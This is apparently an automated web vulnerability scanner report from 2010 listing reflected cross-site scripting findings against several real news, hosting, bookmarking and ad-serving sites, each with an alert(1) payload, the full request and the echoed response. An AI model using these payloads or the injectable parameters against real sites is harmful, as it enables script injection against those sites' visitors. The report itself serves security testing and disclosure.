HTTP/1.0 200 OK Cache-Control: max-age=0, s-maxage=0 Content-Length: 61011 Content-Type: text/html; charset=iso-8859-1 Expires: Mon, 15 Nov 2010 01:15:44 GMT Last-Modified: Mon, 15 Nov 2010 01:15:44 GMT Server: Microsoft-IIS/7.0 Set-Cookie: PBCSPERMUSERID=1073409062144085; path=/; expires=Mon, 14 Nov 2011 17:15:44 GMT Set-Cookie: PBCSSESSIONID=1073409062144085; path=/ X-Passed-To: S260608AT1VW025, URL Rewrite on site N/A (2010-11-14 20:15:44:070) X-Handled-By: S260608AT1VW025, Rewrite on site N/A X-Actual-URL: S260608AT1VW025, (/apps/pbcs.dll/article?AID=/20101114/NEWS/c1270'%3bcaf06659bd4/0/business&Title=Juggler-with-replica-grenade-causes-stir-at-Fisherman-s-Wharf) X-Passed-To-DLL: S260608AT1VW025, (2010-11-14 20:15:44:070) X-Passed-To-BeforeDispatch: S260608AT1VW025, on site SR (2010-11-14 20:15:44:070) X-Returned-From-BeforeDispatch: S260608AT1VW025, on site SR (2010-11-14 20:15:44:367) X-Passed-To-PostProcessResponse: S260608AT1VW025, on site SR (2010-11-14 20:15:48:570) X-Returned-From-PostProcessResponse: S260608AT1VW025, on site SR (2010-11-14 20:15:48:570) X-Returned-From-DLL: S260608AT1VW025 (2010-11-14 20:15:48:570) X-Returned-From: S260608AT1VW025(2010-11-14 20:15:48:570) Date: Mon, 15 Nov 2010 01:15:48 GMT X-Cache: MISS from nysquid01 X-Cache-Lookup: MISS from nysquid01:80 Via: 1.0 nysquid01 (squid/3.0.STABLE18) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
The ar ...[SNIP]...
} else { url = 'http://www.pressdemocrat.com'; } // Builds url to be passed to Outbrain sans the querystring parameters. SW var strUrl = url + '/article/20101114/NEWS/c1270';caf06659bd4/0/'; return strUrl; //document.write(strUrl); } var OB_permalink= grabUrlOutBrain(); var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; var OB_Template = "nytrmg"; var OB_ ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f38c"><script>alert(1)</script>f1115e3a769 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/article.cgi?f=/c/a/2010/11/13/DDGM1GB7GD.DTL&type=music8f38c"><script>alert(1)</script>f1115e3a769 HTTP/1.1 Host: www.sfgate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 00:35:49 GMT Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1 Set-Cookie: Apache=174.122.23.218.1289781349498136; path=/; max-age=31536000; domain=.sfgate.com Content-Length: 114236 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas="http://contribute.sfgate ...[SNIP]... <a href="/cgi-bin/object/article?f=/c/a/2010/11/13/DDGM1GB7GD.DTL&object=%2Fc%2Fpictures%2F2010%2F11%2F12%2Fdd-symph13_ph_0502549497.jpg&type=music8f38c"><script>alert(1)</script>f1115e3a769"> ...[SNIP]...
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87a76"%3balert(1)//81f3d367913 was submitted in the partner parameter. This input was echoed as 87a76";alert(1)//81f3d367913 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-control: private Content-Type: text/html Date: Mon, 15 Nov 2010 01:58:28 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND ONL UNI COM NAV STA PRE",policyref="/w3c/p3p.xml" Server: Microsoft-IIS/6.0 Content-Length: 2118 Connection: keep-alive
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ebf5"%3balert(1)//9c1affca30c was submitted in the url parameter. This input was echoed as 7ebf5";alert(1)//9c1affca30c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-control: private Content-Type: text/html Date: Mon, 15 Nov 2010 01:58:29 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND ONL UNI COM NAV STA PRE",policyref="/w3c/p3p.xml" Server: Microsoft-IIS/6.0 Content-Length: 2118 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/2.5.2/build/reset ...[SNIP]... (function () { Map.init("http://cdn-tiles.sigalert.com/9/Blue", 0, "", false); }); YAHOO.util.Event.on("idPortletViewport", "click", function () { Map.fullReport("http://www.mercurynews.com/traffic7ebf5";alert(1)//9c1affca30c"); }); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7c50"><script>alert(1)</script>331e8b91ab4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entriese7c50"><script>alert(1)</script>331e8b91ab4/chris-roisin/1/1285183839/tpod.html HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:58:56 GMT Server: Apache Content-language: " Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 7578
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b892f"><script>alert(1)</script>17dc6b007a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entries/chris-roisinb892f"><script>alert(1)</script>17dc6b007a8/1/1285183839/tpod.html HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:58:56 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 8478
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 //EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Page Not Found</tit ...[SNIP]... <a href="http://www.travelpod.ca/travel-blog-entries/chris-roisinb892f"><script>alert(1)</script>17dc6b007a8/1/1285183839/tpod.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2abe5"><script>alert(1)</script>df6448af980 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entries/chris-roisin/12abe5"><script>alert(1)</script>df6448af980/1285183839/tpod.html HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:58:57 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 8478
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 //EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Page Not Found</tit ...[SNIP]... <a href="http://www.travelpod.ca/travel-blog-entries/chris-roisin/12abe5"><script>alert(1)</script>df6448af980/1285183839/tpod.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b5e"><script>alert(1)</script>445c8b06197 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entries/chris-roisin/1/1285183839/tpod.html78b5e"><script>alert(1)</script>445c8b06197 HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 01:58:58 GMT Server: Apache Content-language: " Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 7578
3.312. http://www.travelpod.com/travel-blog-entries/chris-roisin/1/1285183839/tpod.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a96f"><script>alert(1)</script>c36d7607742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /travel-blog-entries/chris-roisin/1/1285183839/tpod.html?3a96f"><script>alert(1)</script>c36d7607742=1 HTTP/1.1 Host: www.travelpod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 01:58:54 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 89558
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 //EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:v="urn:schemas-microsoft-com:vm ...[SNIP]... <a href="http://www.travelpod.ca/travel-blog-entries/chris-roisin/1/1285183839/tpod.html?3a96f"><script>alert(1)</script>c36d7607742=1"> ...[SNIP]...
The value of the _h request parameter is copied into the HTML document as plain text between tags. The payload bb70a<script>alert(1)</script>95663d9a58e was submitted in the _h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f34d0"><script>alert(1)</script>f83d2ed9994 was submitted in the _h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _w request parameter is copied into the HTML document as plain text between tags. The payload f6db3<script>alert(1)</script>51af5c2ec60 was submitted in the _w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _w request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e926"><script>alert(1)</script>9660dc5851c was submitted in the _w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the affid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de77c'%3balert(1)//b315e82560b was submitted in the affid parameter. This input was echoed as de77c';alert(1)//b315e82560b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the paidid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94eca'%3balert(1)//5fb0354ea8d was submitted in the paidid parameter. This input was echoed as 94eca';alert(1)//5fb0354ea8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the swt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168e7"><script>alert(1)</script>85fa758f10a was submitted in the swt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 522b6'%3b4141e71064b was submitted in the REST URL parameter 1. This input was echoed as 522b6';4141e71064b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55fde'%3bd472d2014cb was submitted in the REST URL parameter 2. This input was echoed as 55fde';d472d2014cb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into an HTML comment. The payload ce6d2--><script>alert(1)</script>3d207f3b4af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET / HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ce6d2--><script>alert(1)</script>3d207f3b4af
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:12:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pqs1un552xpzc455nlgueir0; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=http://www.google.com/search?hl=en&q=ce6d2--><script>alert(1)</script>3d207f3b4af&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 210398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd407"><script>alert(1)</script>715bb58c7ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bd407"><script>alert(1)</script>715bb58c7ce
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:22:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=bd407"><script>alert(1)</script>715bb58c7ce" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload faa99<script>alert(1)</script>175acf5c8e3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=faa99<script>alert(1)</script>175acf5c8e3
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:22:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>faa99<script>alert(1)</script>175acf5c8e3 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a73bf"><script>alert(1)</script>211ed40a6e1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.radiogodaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a73bf"><script>alert(1)</script>211ed40a6e1
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:30:33 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
X-Powered-By: ASP.NET
Content-Length: 73243
Content-Type: text/html
Expires: Mon, 08 Nov 2010 01:50:33 GMT
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 14-Nov-2011 07:00:00 GMT; domain=.radiogodaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 21-Nov-2010 07:00:00 GMT; domain=.radiogodaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.radiogodaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.radiogodaddy.com; path=/
Set-Cookie: ASPSESSIONIDACQDQCBA=EPLLNOCALPGJDPOEDAEIAJCI; path=/
Cache-control: no-cache
<script language="javascript"> var imagesURL = "https://imagesak.securepaynet.net/"; var secPrefix = "http"; </script> <script language="javascript"> function openDemoVideo(mediaID, ...[SNIP]... <img src="http://img.godaddy.com/image.aspx?sitename=www.radiogodaddy.com&server=CORPWEB169&page=/gdshop/live/default.asp&referrer=http://www.google.com/search?hl=en&q=a73bf"><script>alert(1)</script>211ed40a6e1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&status=200 OK&referringpath=&client_path=&querystring=show%3D267" border="0" width="0" height="0"> ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f88a'%3balert(1)//b39c6e64e0a was submitted in the cli cookie. This input was echoed as 4f88a';alert(1)//b39c6e64e0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd39f"%3balert(1)//f374c9d01b6 was submitted in the cli cookie. This input was echoed as fd39f";alert(1)//f374c9d01b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 14 Nov 2010 23:03:12 GMT
Connection: close
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sun, 21-Nov-2010 23:03:12 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 15-Nov-2010 07:03:12 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 15-Nov-2010 23:03:12 GMT
Content-Length: 7685
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... ttp://tags.bluekai.com/site/2731");CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=563589045;redirect=http://a.collective-media.net/datapair?net=qc&id=11c4bc59fd87e17fd39f";alert(1)//f374c9d01b6&segs=!qcsegs&op=add");
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5837b<script>alert(1)</script>2765fadb63d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex5837b<script>alert(1)</script>2765fadb63d/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c?noredirect=1
x-ysws-request-id: 7902381d-c315-4b53-864a-7f7d3f51b6e7
Date: Mon, 15 Nov 2010 02:47:07 GMT
Connection: close
Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex5837b<script>alert(1)</script>2765fadb63d/mediastore/062730bb-1899-481b-a0a5-5d453b885c3c</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74a41<script>alert(1)</script>8dd34fb94e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore74a41<script>alert(1)</script>8dd34fb94e2/062730bb-1899-481b-a0a5-5d453b885c3c?noredirect=1
x-ysws-request-id: 92f49b23-3401-4bc4-bf75-1a39642a86e1
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore74a41<script>alert(1)</script>8dd34fb94e2/062730bb-1899-481b-a0a5-5d453b885c3c</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1ea2<script>alert(1)</script>00aa69cda0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3ce1ea2<script>alert(1)</script>00aa69cda0?noredirect=1
x-ysws-request-id: e8aadf1c-9db3-4851-8fa6-14e240edeea1
Date: Mon, 15 Nov 2010 02:47:09 GMT
Connection: close
Content-Length: 169
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/062730bb-1899-481b-a0a5-5d453b885c3ce1ea2<script>alert(1)</script>00aa69cda0</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80bfa<script>alert(1)</script>f2ae7e14495 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex80bfa<script>alert(1)</script>f2ae7e14495/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070?noredirect=1
x-ysws-request-id: 1a96c02e-3522-4806-bea5-7964f61b6115
Date: Mon, 15 Nov 2010 02:47:09 GMT
Connection: close
Content-Length: 170
